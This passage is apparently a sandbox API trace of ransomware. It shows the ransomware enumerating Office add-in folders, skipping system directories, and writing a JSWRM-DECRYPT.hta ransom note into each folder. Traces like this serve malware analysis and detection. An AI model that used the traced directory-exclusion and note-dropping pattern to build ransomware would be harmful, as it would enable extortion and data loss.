lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0123.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.045] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5c164a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.045] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0123.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.045] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="de", cAlternateFileName="")) returned 1 [0123.045] lstrcmpiW (lpString1="de", lpString2=".") returned 1 [0123.045] lstrcmpiW (lpString1="de", lpString2="..") returned 1 [0123.045] lstrcmpiW (lpString1="de", lpString2="...") returned 1 [0123.045] lstrcmpiW (lpString1="de", lpString2="windows") returned -1 [0123.045] lstrcmpiW (lpString1="de", lpString2="recovery") returned -1 [0123.045] lstrcmpiW (lpString1="de", lpString2="perflogs") returned -1 [0123.045] lstrcmpiW (lpString1="de", lpString2="documents and settings") returned -1 [0123.045] lstrcmpiW (lpString1="de", lpString2="$RECYCLE.BIN") returned 1 [0123.045] lstrcmpiW (lpString1="de", lpString2="system volume information") returned -1 [0123.045] lstrcmpiW (lpString1="de", lpString2="msocache") returned -1 [0123.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\de\\jswrm-decrypt.hta")) returned 0xffffffff [0123.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0123.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0123.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\de\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.048] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.048] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.049] CloseHandle (hObject=0x338) returned 1 [0123.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\de\\jswrm-decrypt.hta")) returned 0x20 [0123.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.050] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\de\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4001d1d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x232140 [0123.050] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.050] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4001d1d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.050] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.050] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.050] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4001d1d3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4001d1d3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4001d1d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.050] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.051] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf003cf13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.051] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0123.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0123.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0123.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0123.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.051] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22a9f7a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22a9f7a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0123.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0123.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0123.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0123.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0123.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.052] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x624ad43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.052] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.053] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0123.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0123.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0123.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.053] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5eb74f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5eb74f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f4ff2d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.053] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.053] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.053] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.053] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.053] lstrcmpiW 